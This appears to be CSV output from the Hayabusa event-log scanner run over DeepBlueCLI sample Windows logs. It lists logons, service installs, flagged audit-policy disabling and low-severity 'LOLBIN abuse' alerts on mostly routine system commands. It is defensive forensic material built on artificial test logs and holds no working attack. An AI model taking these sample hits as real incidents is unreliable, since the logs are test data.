2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1a23a | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1a265 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1a265,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:48:20.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1e056 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1e3c9 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,info,,Logoff,User: IEUser | LID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,info,,Logoff,User: IEUser | LID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x6831f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x6831f | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x6832b | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:20.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x6832b,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:36.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:38.430 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1dc1e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1dc1e | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1ee41 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:48:31.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:48:31.289 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1ee41,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:38.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:49:38.281 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:39.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-18 23:49:40.000 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:40.000 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1b293,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b293 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b2fd | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:42.406 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Intel(R) PRO/1000 NDIS 6 Adapter Driver | Path: system32\DRIVERS\E1G60I32.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 00:28:28.043 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1b2fd,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:28:38.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 00:29:27.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 00:29:27.609 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:28.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 00:29:29.859 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:29.859 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1aae1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1aae1 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1af2f | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:32:23.580 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: Google Update Service (gupdate) | Path: ""C:\Program Files\Google\Update\GoogleUpdate.exe"" /svc | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 00:32:23.595 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: Google Update Service (gupdatem) | Path: ""C:\Program Files\Google\Update\GoogleUpdate.exe"" /medsvc | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 01:52:36.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:52:58.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 01:58:34.966 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x190 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 01:58:34.997 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x72c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 02:06:20.341 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0xb44 | User: IEUser | LID: 0x970d9",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 02:34:07.763 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\winsat.exe formal -log -cancelevent 850b2fce-84b7-4abd-a41f-f04c912c6e37 | Path: C:\Windows\System32\WinSAT.exe | PID: 0xfe4 | User: IEUser | LID: 0x970a9,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 02:35:08.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" -IdleTask -TaskName MpIdleTask | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x600 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 02:37:08.229 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 02:44:08.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xd68 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 02:44:08.499 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\itulqket.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x34c | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 02:44:08.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ssh63wbw.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xa50 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 02:44:08.765 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\pcbguge2.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xee8 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 02:44:08.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\uacrfkow.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x7d8 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 02:44:09.484 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x944 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 02:44:09.499 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xe70 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 03:07:37.968 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0x7d8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 03:46:19.937 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 03:46:20.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 03:57:20.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc80 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 03:57:21.015 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x8f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 04:05:34.164 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x92c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 04:05:34.195 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc90 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 04:55:29.037 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xd20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 04:55:30.037 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160818195530.log C:\Windows\Logs\CBS\CbsPersist_20160818195530.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 04:55:33.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 04:55:49.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 04:55:51.989 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x71c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 04:55:52.176 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
